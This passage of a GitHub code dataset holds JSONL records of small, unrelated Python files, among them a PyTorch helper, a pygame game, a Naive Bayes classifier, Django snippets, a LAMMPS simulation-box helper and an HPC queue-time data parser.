[[review_str, label_num]..]\ndef get_tokenized_imdb(data):\n def tokenizer(text):\n return [tok.lower() for tok in text.split(' ')]\n return [tokenizer(review) for review, _ in data]\n\ndef get_vocab_imdb(data):\n tokenized_data = get_tokenized_imdb(data)\n counter = collections.Counter([tk for st in tokenized_data for tk in st])\n return Vocab.Vocab(counter, min_freq=5) # Don't use word that num < 5.\n\ndef preprocess_imdb(data, vocab, max_length=500):\n max_l = max_length # 将每条评论通过截断或者补0,使得长度变成500\n\n def pad(x):\n return x[:max_l] if len(x) > max_l else x + [0] * (max_l - len(x))\n\n tokenized_data = get_tokenized_imdb(data)\n features = torch.tensor([pad([vocab.stoi[word] \n for word in words]) \n for words in tokenized_data])\n labels = torch.tensor([score for _, score in data])\n return features, labels\n\ndef load_pretrained_embedding(words, pretrained_vocab):\n \"\"\"从预训练好的vocab中提取出words对应的词向量\"\"\"\n embed = torch.zeros(len(words), pretrained_vocab.vectors[0].shape[0]) # 初始化为0\n for i, word in enumerate(words):\n try:\n idx = pretrained_vocab.stoi[word]\n embed[i, :] = pretrained_vocab.vectors[idx]\n except KeyError:\n continue\n\n return embed\n\ndef predict_sentiment(net, vocab, sentence):\n \"\"\"sentence是词语的列表\"\"\"\n device = list(net.parameters())[0].device\n sentence = torch.tensor([vocab.stoi[word] for word in sentence], device=device)\n label = torch.argmax(net(sentence.view((1, -1))), dim=1)\n return 'positive' if label.item() == 1 else 'negative'\n\ndef train(train_iter, test_iter, net, loss, optimizer, device, num_epochs):\n net = net.to(device)\n print(\"training on\", device)\n batch_count = 0\n for epoch in range(num_epochs):\n train_l_sum, train_acc_sum, n, start = 0.0, 0.0, 0, time.time()\n for X, y in train_iter:\n X = X.to(device)\n y = y.to(device)\n y_hat = net(X)\n l = loss(y_hat, y) \n optimizer.zero_grad()\n l.backward()\n optimizer.step()\n train_l_sum += l.cpu().item()\n train_acc_sum += (y_hat.argmax(dim=1) == y).sum().cpu().item()\n n += y.shape[0]\n batch_count += 1\n test_acc = evaluate_accuracy(test_iter, net)\n print('epoch %d, loss %.4f, train acc %.3f, test acc %.3f, time %.1f sec'\n % (epoch + 1, train_l_sum / batch_count, train_acc_sum / n, test_acc, time.time() - start))","repo_name":"czqmike/StudyNote","sub_path":"PyTorch/d2lzh_pytorch.py","file_name":"d2lzh_pytorch.py","file_ext":"py","file_size_in_byte":19643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40145609007","text":"### JHL Development Robot Coffee Barista\n### Learning In Python Part 3\n\nbusiness = \"Jacks Coffee House\" ## Name Of The Buisness\n\nprice = 5 ## Price Of Each Coffee (All Coffees Are The Same Price Currently)\n\nmenu = \"Black Coffee, Espresso, Light and Sweet,\\n\" + \"Ice Coffee, and Cappucino\" ## Items Listed On Menu\n\nprint(\"Hello Welcome To \" + business + \"!!!\")\n\nprint(\"Thank you so much for coming in today!!!\")\n\nname = input(\"What is your name?\\n\") ## Persons Name\n\nif name == \"Ben\": ## Ben was banned from my coffee shop \n print(\"You are banned from \" + business + \" we will not serve you. \" + \n \"Please leave!!!\") ## This is the message they will recieve if they try to enter (Ben)\n exit()\nelse:\n print(\"Nice to meet you \" + name + \"!!!\" +\n \" Thank you for coming in today!!!\")\n\norder = input(\"What Would You Like To Order?\\n\" +\n \"This Is What We Have On Our Menu For Today:\\n\" + menu + \"\\n\")\n\nquantity = input(\"How much \" + order + \" Would you like?\\n\")\n\ntotal = price * int(quantity)\n\nprint(\"Sounds great \" + name + \" Your total is going to be \" + \"$\" +\n str(total) + \"\\n\" + \"we will get your \" + quantity + \" \" + order +\n \" right up for you!!!\" +\n \" We will call you to the register when your \\n\" + quantity + \" \" +\n order + \" is ready!!!\")\n\nprint(\"Hey \" + name + \" Your \" + quantity + \" \" + order +\n \" is ready at the counter!!!\\n\" + \"Thank you for choosing \" + business +\n \"!!!\\n\" + \"Have a good day, and we hope to see you soon!!!\")\n","repo_name":"JackLuberto/Python-Barista-Bot3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36488723565","text":"#! /usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n# USAGE sript genelist.txt annotab.csv\n# v 05/08/2014\n# This script pulls out the entries from the banana gene annotation table based on a list of according banana gene names. \n\nimport os as os\nimport sys\n\n#genelist = open('02_get_common_gene_seq/sorted_genelist.txt','r')\n#MACUanno = open('00D_DB/banana_genefunct_biomart.txt','r')\n\n \n\n\ngenelist = open(sys.argv[1],'r')\nMACUanno = open(sys.argv[2],'r')\ngeneanno = open(\"parselength_mitoch_28oct.csv\",'a')\n\n#element=MACUanno.readlines().rsplit()\n#gene=genelist.readline().rstrip(\"\\n\")\n#element=element.split(',')\nrows=[]\nlist_name=[]\n\nfor line in MACUanno:\n rows.append(line)\n list_name.append(line.rsplit(',')[0])\n\n\nfor i in genelist:\n j=i.rstrip('\\n')\n marker=0\n while (list_name[marker:].count(j)>0): \n index_g=list_name[marker:].index(j)\n geneanno.write(rows[marker+index_g])\n marker+=index_g+1\n ","repo_name":"JeannineM/MarkerDev","sub_path":"parseanno.py","file_name":"parseanno.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22481411966","text":"class NaiveBayesClassifier:\n\n\tdef __init__(self, laplace = True):\n\t\tself.laplace = laplace\n\n\tdef fit(self, X, y, categorical_features = None, numerical_features = None, labels = (0, 1)):\n\t\tself.label_dict = {i : y[y == i].shape[0]/y.shape[0] for i in labels}\n\t\tself.unique_val = dict()\n\t\tself.prob_dict = dict()\n\n\t\tif categorical_features is None:\n\t\t\tcategorical_prob = dict()\n\t\telse:\n\t\t\tcategorical_prob = dict()\n\t\t\tfor i in categorical_features:\n\t\t\t\tcategorical_prob.setdefault(i, dict())\n\t\t\t\tcol_i_prob = dict()\n\t\t\t\tcol_i = X[:, i]\n\t\t\t\tself.unique_val.setdefault(i, 0)\n\t\t\t\tself.unique_val[i] = np.unique(col_i).shape[0]\n\t\t\t\tfor x in np.unique(col_i):\n\t\t\t\t\tcol_i_prob.setdefault(x, dict())\n\t\t\t\t\tif self.laplace:\n\t\t\t\t\t\tcol_i_prob[x] = {\n\t\t\t\t\t\t\tj : (np.sum((col_i == x) & (y == j)) + 1)/(np.sum(y == j) + self.unique_val[i])\\\n\t\t\t\t\t\t\tfor j in labels\n\t\t\t\t\t\t}\n\t\t\t\t\telse:\n\t\t\t\t\t\tcol_i_prob[x] = {\n\t\t\t\t\t\t\tj : np.sum((col_i == x) & (y == j))/np.sum(y == j) for j in labels\n\t\t\t\t\t\t}\n\t\t\t\tcategorical_prob[i] = col_i_prob\n\n\t\tif numerical_features is None:\n\t\t\tnumerical_prob = dict()\n\t\telse:\n\t\t\tnumerical_prob = dict()\n\t\t\tfor i in numerical_features:\n\t\t\t\tcol_i = X[:, i]\n\t\t\t\tnumerical_prob.setdefault(i, dict())\n\t\t\t\tfor j in labels:\n\t\t\t\t\tmean, std = (col_i[y == j]).mean(), (col_i[y == j]).std(ddof = 1)\n\t\t\t\t\tnumerical_prob[i][j] = (mean, std)\n\n\t\tself.prob_dict.update(categorical_prob)\n\t\tself.prob_dict.update(numerical_prob)\n\n\t\tself.numerical = numerical_features\n\t\tself.categorical = categorical_features\n\t\tself.labels = labels\n\n\t\treturn self\n\tdef predict(self, X):\n\t\ty_predict = []\n\n\t\tfor x in X:\n\t\t\tpredict_value = None\n\t\t\tprob_max = -1\n\t\t\tfor label in self.labels:\n\t\t\t\tprobs = []\n\n\t\t\t\tif self.categorical is not None:\n\t\t\t\t\tfor categorical_col in self.categorical:\n\t\t\t\t\t\tif categorical_col in self.prob_dict.keys():\n\t\t\t\t\t\t\tif x[categorical_col] in self.prob_dict[categorical_col].keys():\n\t\t\t\t\t\t\t\tprobs.append(self.prob_dict[categorical_col][x[categorical_col]][label])\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tprobs.append(1/self.unique_val[categorical_col])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tprobs.append(1/self.unique_val[categorical_col]) \n\n\t\t\t\tif self.numerical is not None:\n\t\t\t\t\tfor numerical_col in self.numerical:\n\t\t\t\t\t\tmean, std = self.prob_dict[numerical_col][label]\n\t\t\t\t\t\tdensity = 1/(std * sqrt(2*pi)) * exp**(-(x[numerical_col] - mean)**2/(2 * std**2))\n\t\t\t\t\t\tprobs.append(density)\n\n\t\t\t\tprob_label = self.label_dict[label] * np.cumprod(probs)[-1]\n\t\t\t\tif prob_label > prob_max:\n\t\t\t\t\tpredict_value, prob_max = label, prob_label\n\t\t\ty_predict.append(predict_value)\n\t\treturn np.array(y_predict)\n","repo_name":"PhuThanh-Nguyen/Introduction-to-Machine-Learning-Coursework","sub_path":"Code snippet/NaiveBayesClassifier.py","file_name":"NaiveBayesClassifier.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38434976140","text":"import os\n\nfrom contextlib import contextmanager\n\nfrom .filepath import FilePath\n\n\n@contextmanager\ndef working_directory(path: FilePath):\n current = os.getcwd()\n\n try:\n yield os.chdir(path)\n finally:\n os.chdir(current)\n\n\ncd = working_directory\n\n\ndef ensure_directory(filepath: FilePath):\n directory = os.path.dirname(filepath)\n\n os.makedirs(directory, exist_ok=True)\n\n return directory\n","repo_name":"swp-berlin/webmonitor","sub_path":"swp/utils/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"42818855692","text":"import pygame\nfrom pygame import init, display, time, font, mixer, image, key\nfrom random import randrange\n\ninit()\n\nscreen = display.set_mode((500, 1000))\nclock = time.Clock()\n\nscoreFont = font.Font(\"fonts/Rubik-weight.ttf\", 25)\ngameoverFont = font.Font(\"fonts/Rubik-weight.ttf\", 75)\nrestartFont = font.Font(\"fonts/Rubik-weight.ttf\", 30)\nkeyboardcommandFont = font.Font(\"fonts/Rubik-weight.ttf\", 20)\n\nmixer.music.load(\"music/Music.wav\")\nmixer.music.play(-1)\nmixer.music.set_volume(0.5)\n\nbackground = image.load(\"images/Background.png\")\n\nscore, highscore = 0, 0\ngameover = False\ncan_move = True\n\nplayerImage = image.load(\"images/Player.png\")\nplayerX, playerY = 225, 475\nplayerWidth, playerHeight = 50, 50\nplayerSpeed = 10\n\nenemyImage = image.load(\"images/Enemy.png\")\nenemyX, enemyY = 0, randrange(1000)\nenemyWidth, enemyHeight = 30, 30\nenemySpeed = 20\n\nis_running = True\nwhile is_running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n is_running = False\n\n pressed = key.get_pressed()\n if can_move:\n if pressed[pygame.K_LEFT]: # Move Left\n playerX -= playerSpeed\n elif pressed[pygame.K_RIGHT]: # Move Right\n playerX += playerSpeed\n\n if pressed[pygame.K_SPACE] and gameover: # Restart\n playerX, playerY = 225, 475\n can_move = True\n\n if pressed[pygame.K_ESCAPE]: # Quit\n pygame.quit()\n\n enemyY += enemySpeed # Spawn-Random-Enemy\n if enemyY >= 1000:\n enemyX, enemyY = randrange(480), 0\n\n if score % 200 == 0: # Enemy-Speed-Increase\n enemySpeed += 0.5\n\n playerX = max(0, min(playerX, 450)) # Player-Screen-Barrier\n\n screen.blit(background, (0, 0))\n enemy = screen.blit(enemyImage, (enemyX, enemyY, enemyWidth, enemyHeight))\n player = screen.blit(playerImage, (playerX, playerY, playerWidth, playerHeight))\n\n scoretext = scoreFont.render(\"Score: \" + str(score), 1, (255, 255, 255))\n screen.blit(scoretext, (20, 20))\n highscoretext = scoreFont.render(\"Highscore: \" + str(highscore), 1, (255, 255, 255))\n screen.blit(highscoretext, (20, 60))\n score += 1\n\n keyboardlefttext = keyboardcommandFont.render(\"Movement-Left = Key LEFT\", 1, (255, 255, 255))\n screen.blit(keyboardlefttext, (20, 930))\n keyboardrighttext = keyboardcommandFont.render(\"Movement-Right = Key RIGHT\", 1, (255, 255, 255))\n screen.blit(keyboardrighttext, (20, 960))\n\n if player.colliderect(enemy): # Player-Enemy-Collide\n gameover = True\n can_move = False\n playerX, playerY = 225, 515\n enemyX, enemyY = 235, 510\n enemySpeed = 20\n\n if score > highscore: # Set Highscore\n highscore = score\n score = 0\n\n gameovertext = gameoverFont.render(\"Game Over\", 1, (255, 75, 75))\n screen.blit(gameovertext, (60, 375))\n restarttext = restartFont.render(\"Press Space to restart\", 1, (255, 255, 255))\n screen.blit(restarttext, (95, 450))\n\n display.update()\n clock.tick(60)\n","repo_name":"JulianPlatz/Touch-Not-The-Square","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22392997052","text":"from django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\n\nclass PrivateViewMixin(object):\n @method_decorator(login_required)\n def dispatch(self, *args, **kwargs):\n return super().dispatch(*args, **kwargs)\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n context['is_on_private_page'] = True\n return context\n","repo_name":"despawnerer/thinkies","sub_path":"website/views/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20928270531","text":"# Given an array of positive integers arr, return the sum of all possible odd-length subarrays of arr.\n\n# A subarray is a contiguous subsequence of the array.\n\n\nclass Solution:\n def sumOddLengthSubarrays(self, arr: List[int]) -> int:\n res = 0\n for sublen in range(1, len(arr) + 1, 2):\n idx = 0\n while idx < len(arr) - sublen + 1:\n res += sum(arr[idx : idx + sublen])\n idx += 1\n\n return res\n","repo_name":"Antony-evm/Leet_Code_Solutions","sub_path":"Solutions/1588. Sum of All Odd Length Subarrays/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72447028887","text":"#Ejercicio 11\n#Defina la función porcentaje la cual recibe como parámetro\n#una lista de números flotantes l y un número entero p. La función\n#retorna como resultado el porcentaje p de la suma de los elementos de\n#l. La función recibe como parámetro por defecto la lista vacía.\n\n\ndef porcentaje(lista, p):\n\tsuma = 0\n\tfor i in lista:\n\t\tsuma += i\n\treturn ((suma * p) / 100)\n\nloop = True\nl = []\nwhile(loop):\n\ttry:\n\t\tprint(\"Ingrese un flotante para agregar a la lista, ingrese 0 para terminar de agregar\")\n\t\tflotante = float(input())\n\t\tif(flotante == 0):\n\t\t\tloop = False\n\t\telse:\n\t\t\tl.append(flotante)\n\texcept ValueError:\n\t\tprint(\"El dato ingresado no es valido, intentelo de nuevo!\")\n\n\nloop = True\nwhile(loop):\n\ttry:\n\t\tprint(\"Ingrese el porcentaje a calcular a la suma de los numeros de la lista ingresada:\")\n\t\tp = int(input())\n\t\tloop = False\n\texcept ValueError:\n\t\tprint(\"El porcentaje ingresado no es un entero, intentelo de nuevo!\")\n\nprint(\"Este es el\", p,\"% de la suma de los numeros de la lista ingresada:\")\nprint(porcentaje(l, p))\n\n","repo_name":"Kindue/Python-Argentina-Programa","sub_path":"Unidad 4/4.4 Funciones/Actividades de afianzamiento/Ejercicio11.py","file_name":"Ejercicio11.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18871927101","text":"import os, glob, telnetlib, time\n\nCAMINHO = \"/home/admin/deploy\"\nHOST = \"127.0.0.1\" # conecta no osgi do idempiere via localhost\nPORT = 12612 # porta do osgi\nTIMEOUT = 2\n\n\ntn = telnetlib.Telnet(HOST, PORT, TIMEOUT)\n\n# print(\"Open\")\n# tn.open(HOST, PORT)\nprint(\"ls\")\ntn.write(\"ls\")\nprint(\"exit\")\ntn.write(\"exit\")\n\ntn.close()\nprint('Concluido')\n","repo_name":"jbiason/random","sub_path":"telinet.py","file_name":"telinet.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9550493286","text":"from hdx.hdx_configuration import Configuration\nfrom hdx.data.dataset import Dataset\nfrom hdx.utilities.dictandlist import write_list_to_csv\n\nConfiguration.create(hdx_site='prod', user_agent='A_Quick_Example', hdx_read_only=True)\n# https://data.humdata.org/api/action/package_search?q=*:*&fq=metadata_created:[2018-07-01T00:00:00.000Z%20TO%202018-09-30T00:00:00.000Z]\nrows = list()\ndatasets = Dataset.search_in_hdx(fq='metadata_created:[2019-04-01T00:00:00.000Z TO 2019-06-30T00:00:00.000Z]')\nfor dataset in datasets:\n resources = dataset.resources\n if len(resources) > 0:\n url = resources[0]['url']\n else:\n url = ''\n rows.append([dataset['name'], dataset['metadata_created'], url, dataset['organization']['name']])\nwrite_list_to_csv(rows, 'createddatasets.csv', ['name', 'created', 'url', 'orgname'])","repo_name":"mcarans/scratch","sub_path":"get_new_datasets.py","file_name":"get_new_datasets.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33147463806","text":"from django.urls import path, include\nfrom . import views\n\n\napp_name = 'forum'\nurlpatterns = [\n path('', views.home, name=\"home\"),\n path('forum//themes//page=', views.topic_messages, name=\"detail\"),\n path('forum//themes/page=', views.topics, name=\"topic\"),\n path('accounts/', include('django.contrib.auth.urls')),\n path('accounts/register/', views.register, name='register'),\n path('forum//themes/create/', views.create_topic, name='create_topic'),\n path('forum/page=', views.themes, name=\"theme\"),\n path('forum/create', views.create_theme, name='create_theme'),\n]","repo_name":"Rikucode/Forum","sub_path":"myproject/forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28449408392","text":"from simphony.api import CUBA\n\n\ndef get_box(particle_data_containers,\n command_format=False,\n change_existing=False):\n \"\"\" Get simulation box commands\n\n Using CUBA.VECTOR and CUBA.ORIGIN, return the\n string used by LAMMPS to define the simulation box in\n the LAMMPS data file or as a command.\n\n Currently the box vectors (and origin) have to be\n the same for each particle container.\n\n Parameters:\n -----------\n particle_data_containers: collection of DataContainer\n list of containers of data containers from particles\n command_format: boolean\n if command format is true, then box command suitable\n for lammps-command is returned. Otherwise, the\n string returned is suitable for LAMMPS data file.\n change_existing: boolean\n if true, the lammps-command suitable for changing the\n simulation box is returned\n \"\"\"\n origin = None\n vectors = None\n\n for dc in particle_data_containers:\n # find box vectors (and origin) and ensure\n # that they are the same for each particle container\n if CUBA.VECTOR in dc:\n if (vectors and\n vectors != dc[CUBA.VECTOR]):\n raise RuntimeError(\n \"Box vectors of each Particles need to match\")\n vectors = dc[CUBA.VECTOR]\n else:\n raise RuntimeError(\"CUBA.VECTOR was not set\")\n if CUBA.ORIGIN in dc:\n if origin and origin != dc[CUBA.ORIGIN]:\n raise RuntimeError(\n \"Box origin of each Particles need to match\")\n origin = dc[CUBA.ORIGIN]\n\n # origin is optional\n if not origin:\n origin = (0.0, 0.0, 0.0)\n\n # Note: For LAMMPS we can define a orthogonal simulation\n # or non-orthogonal simulation box. For the non-orthogonal\n # simulation box, the lammps doc states the following:\n # \"a must lie on the positive x axis. b must lie in\n # the xy plane, with strictly positive y component. c may\n # have any orientation with strictly positive z component.\n # The requirement that a, b, and c have strictly positive\n # x, y, and z components, respectively, ensures that a, b,\n # and c form a complete right-handed basis.\"\n\n if not vectors:\n raise RuntimeError(\"CUBA.VECTOR was not set\")\n else:\n _check_vectors(vectors)\n\n box_string = \"\"\n if command_format:\n if change_existing:\n box_string = _get_change_region_box_string()\n else:\n box_string = _get_command_region_box_string()\n else:\n if change_existing:\n RuntimeError(\"change existing is not supported for data file\")\n box_string = _get_data_file_box_string()\n\n return box_string.format(origin[0], vectors[0][0]+origin[0],\n origin[1], vectors[1][1]+origin[1],\n origin[2], vectors[2][2]+origin[2])\n\n\ndef _check_vectors(vectors):\n # TODO: currently only handling orthogonal simulation box\n # (where a must lie on positive x axis..) so only something\n # like the following is allowed: (x, 0, 0), (0, y, 0)\n # and (0, 0, z).\n for i, v in enumerate(vectors):\n for j, x in enumerate(v):\n if i != j and float(x) != 0.0:\n msg = (\"Box vectors must have the form \"\n \"(x, 0, 0), (0, y, 0) and (0, 0, z)\")\n raise RuntimeError(msg)\n\n\ndef _get_data_file_box_string():\n box = \"{:.16e} {:.16e} xlo xhi\\n\"\n box += \"{:.16e} {:.16e} ylo yhi\\n\"\n box += \"{:.16e} {:.16e} zlo zhi\\n\"\n return box\n\n\ndef _get_command_region_box_string():\n box = \"region box block {:.16e} {:.16e} \"\n box += \"{:.16e} {:.16e} \"\n box += \"{:.16e} {:.16e}\\n\"\n return box\n\n\ndef _get_change_region_box_string():\n box = \"change_box all x final {:.16e} {:.16e} \"\n box += \"y final {:.16e} {:.16e} \"\n box += \"z final {:.16e} {:.16e}\\n\"\n return box\n","repo_name":"simphony/simphony-lammps","sub_path":"simlammps/config/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"37599580669","text":"def all_paths():\r\n #-----------------------------ADAPT THIS DIRECTORY TO YOUR SYSTEM---------------------------------------------------\r\n main_branch = r\"~/Desktop/CloudCrystal/predictor\"\r\n #-----------------------------ADAPT THIS DIRECTORY TO YOUR SYSTEM---------------------------------------------------\r\n \r\n data_and_scripts_location = {\r\n # data paths\r\n \"general_data_path\": main_branch + r\"/Data\",\r\n \"data_path\": main_branch + r\"/Data\",\r\n \"Data\": main_branch + r\"/Data\",\r\n #raw data path\r\n \"raw_data_path\": main_branch + r\"/Data/raw\",\r\n \"Data/raw\": main_branch + r\"/Data/raw\",\r\n #parsed data path\r\n \"parsed_data_path\": main_branch + r\"/Data/parsed\",\r\n \"Data/parsed\": main_branch + r\"/Data/parsed\",\r\n #python scripts path\r\n \"scripts_path\": main_branch + r\"/Lib\",\r\n \"Lib\": main_branch + r\"/Lib\",\r\n #path to keras models\r\n \"models_path\": main_branch + r\"/Models\",\r\n \"Models\": main_branch + r\"/Models\",\r\n #path of the forecasts\r\n \"forecasts_path\": main_branch + r\"/Forecasts\",\r\n \"Forecasts\": main_branch + r\"/Forecasts\",\r\n }\r\n return data_and_scripts_location\r\n\r\n\r\n\r\ndef convert_path(full_path):\r\n #make sure the path is OS indipendent\r\n from os.path import expanduser\r\n from os.path import join\r\n home = expanduser(\"~\")\r\n full_path_w=full_path.split(\"/\")\r\n conv_full_path = home\r\n for f in full_path_w[1:]:\r\n conv_full_path = join(conv_full_path,f)\r\n return conv_full_path\r\n\r\n\r\n\r\ndef parse_raw_data(rawdata_name_dot_csv):\r\n #-----------------------------------------------IMPORT TIME--------------------------------------------------------\r\n import time\r\n #-----------------------------------------------IMPORT TIME--------------------------------------------------------\r\n start_time = time.time()\r\n\r\n data_and_scripts_location = all_paths()\r\n raw_data_path = data_and_scripts_location[\"Data/raw\"]\r\n\r\n #-----------------------------------------------IMPORT PANDAS--------------------------------------------------------\r\n import pandas as pd\r\n #-----------------------------------------------IMPORT PANDAS--------------------------------------------------------\r\n DF = pd.read_csv(raw_data_path + \"/\" + rawdata_name_dot_csv , sep='|', low_memory = False)\r\n\r\n print(\"Start parsing the data...\")\r\n\r\n #print(DF.columns.values)\r\n featureNames = DF.columns.values\r\n numFeatures = len(DF.columns.values)\r\n\r\n requiredFeatures = ['Partition','ReqNodes','ReqCPUS','NNodes','Timelimit','Submit','Start','End','Eligible','QueueTime']\r\n\r\n out = set(featureNames).intersection(requiredFeatures)\r\n if (len(out)!=len(requiredFeatures)):\r\n missing = [feature for feature in requiredFeatures if feature not in featureNames]\r\n raise ValueError(\"The following Features: %s are missing (or mispelled) in the provided dataset\" % missing)\r\n\r\n workingDataset = DF.loc[:,requiredFeatures]\r\n\r\n # Convert q times to integers (in seconds)\r\n print(\"------------------------------------Parse the feature 'QueueTime'-------------------------------------\")\r\n QTseries = workingDataset.loc[:,\"QueueTime\"]\r\n # A better strategy to deal with non formatted time is needed to make the algorithm more robust\r\n ld = QTseries.str.contains(\"day\")\r\n if any(ld): \r\n print(\"special convertion from days is needed \\ndetecting number of days...\")\r\n QTdays = QTseries.loc[ld]\r\n days = []\r\n for day in QTdays:\r\n dayFormat = day.split(\" \")\r\n days.append(int(dayFormat[0])*24*60) #convert days into minutes\r\n #days.append(\"%i:00:00\"%dayValue)\r\n print(\"No. %i entries detected with unkown time format of type 'days' for qTimes.\"%ld.values.sum())\r\n QTseries.loc[ld] = days\r\n\r\n #convert to minutes and neglect the seconds to keep integer format\r\n QTseries.loc[~ld] = QTseries.loc[~ld].str.split(':').apply(lambda x: int(x[0]) * 60 + int(x[1]))\r\n print(\"-------------------------------------done-------------------------------------------------------------\")\r\n\r\n\r\n # Convert the time limits to integers (in seconds)\r\n print(\"------------------------------------Parse the feature 'Timelimit'-------------------------------------\")\r\n TLseries = workingDataset.loc[:,\"Timelimit\"]\r\n ltl_u = TLseries.str.contains(\"UNLIMITED\")\r\n ltl_p = TLseries.str.contains(\"Partition_Limit\")\r\n ltl_d = TLseries.str.contains(\"-\")\r\n ltd_up = (ltl_u | ltl_p)\r\n ltl_udp = (ltl_u | ltl_d | ltl_p)\r\n\r\n if any(ltl_p): \r\n print(\"No. %i entries of 'Partition_Limit' type detected. Partition_Limit will be converted into a large integer (~3 years)\"%ltl_p.values.sum())\r\n TLseries.loc[ltl_p] = int(10**8)\r\n\r\n\r\n if any(ltl_u): \r\n print(\"No. %i entries of 'UNLIMITED' type detected. 'UNLIMITED' time will be converted into a large integer (~3 years)\"%ltl_u.values.sum())\r\n TLseries.loc[ltl_u] = int(10**8)\r\n\r\n\r\n if any(ltl_d):\r\n print(\"No. %i entries expressed in days. These values will be converted in minutes.\"%ltl_d.values.sum())\r\n TLseries.loc[ltl_d] = TLseries.loc[ltl_d].str.replace('-',':')\r\n\r\n\r\n #-----------------------------------------------IMPORT NUMPY--------------------------------------------------------\r\n import numpy as np\r\n #-----------------------------------------------IMPORT NUMPY--------------------------------------------------------\r\n y=np.array(range(0,int(ltl_udp.size)))\r\n Zs = pd.Series([\"00:\"]*y[~ltl_udp.values].size, index=y[~ltl_udp.values])\r\n TLseries.loc[~ltl_udp] = Zs.str.cat(TLseries.loc[~ltl_udp])\r\n\r\n #convert to minutes and neglect the seconds\r\n TLseries.loc[~ltd_up] = TLseries.loc[~ltd_up].str.split(':').apply(lambda x: int(x[0]) * 24 * 60 + int(x[1]) * 60 + int(x[2]))\r\n print(\"-------------------------------------done-------------------------------------------------------------\")\r\n\r\n # Convert the submission time into two features (in seconds)\r\n print(\"------------------------------------Parse 'Submission time'-------------------------------------\")\r\n STseries = workingDataset.loc[:,\"Submit\"]\r\n\r\n STseries=STseries.str.replace('T',' ')\r\n STseries=pd.to_datetime(STseries) # this turns the data into pandas Timestamps\r\n print(\"...Converting submit date to weekday\")\r\n workingDataset[\"Weekday\"]=STseries.apply(lambda x: x.weekday())\r\n print(\"...Converting submit date to minutes within the day\")\r\n workingDataset[\"Dayminute\"]=STseries.apply(lambda x: x.hour*60+x.minute)\r\n\r\n # compute week number\r\n week_array_base=workingDataset[\"Weekday\"].values\r\n week_array = np.ones(len(week_array_base)+1)*week_array_base[0]\r\n week_array[1:] = workingDataset[\"Weekday\"].values\r\n new_array_diff=np.diff(week_array)\r\n l_nv = new_array_diff<0\r\n d_nv = 1*l_nv\r\n weeknumber = d_nv.cumsum()+1\r\n workingDataset[\"WeekNumber\"]=pd.Series(weeknumber)\r\n totalweeks = workingDataset[\"WeekNumber\"].values[-1]\r\n\r\n days_in_week=7\r\n workingDataset[\"sin(Weekday)\"]=STseries.apply(lambda x: np.sin(2*np.pi*x.weekday()/days_in_week))\r\n workingDataset[\"cos(Weekday)\"]=STseries.apply(lambda x: np.cos(2*np.pi*x.weekday()/days_in_week)) \r\n\r\n minutes_in_day = 24*60\r\n workingDataset[\"sin(Dayminute)\"]=STseries.apply(lambda x: np.sin(2*np.pi*(x.hour*60+x.minute)/minutes_in_day))\r\n workingDataset[\"cos(Dayminute)\"]=STseries.apply(lambda x: np.cos(2*np.pi*(x.hour*60+x.minute)/minutes_in_day)) \r\n\r\n cols = ['Partition','ReqNodes','ReqCPUS','NNodes','Timelimit','Submit',\"Weekday\",\"WeekNumber\",\"sin(Weekday)\",\"cos(Weekday)\",\"Dayminute\",\"sin(Dayminute)\",\"cos(Dayminute)\",'QueueTime']\r\n\r\n print(\"...Compute size of the dataset and number of weeks\")\r\n sheetLength = len(workingDataset[\"WeekNumber\"])\r\n parsed_data_path = data_and_scripts_location[\"Data/parsed\"]\r\n \r\n #--------------------------------------------OUTPUT------------------------------------------------------------------\r\n output = parsed_data_path + \"/parsed_data_size=\"+str(sheetLength)+\"_weeks=\"+str(totalweeks)+\".csv\"\r\n #--------------------------------------------OUTPUT------------------------------------------------------------------\r\n \r\n workingDataset[cols].to_csv(output, sep=\",\", index = False)\r\n\r\n print(\"-------------------------------------done-------------------------------------------------------------\")\r\n\r\n a,b=workingDataset.shape\r\n print(\"Total time needed to parse %i entries:\" % a)\r\n print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n \r\n print(\"Output: %s\"%output)\r\n \r\n return output\r\n\r\n\r\n\r\n\r\ndef 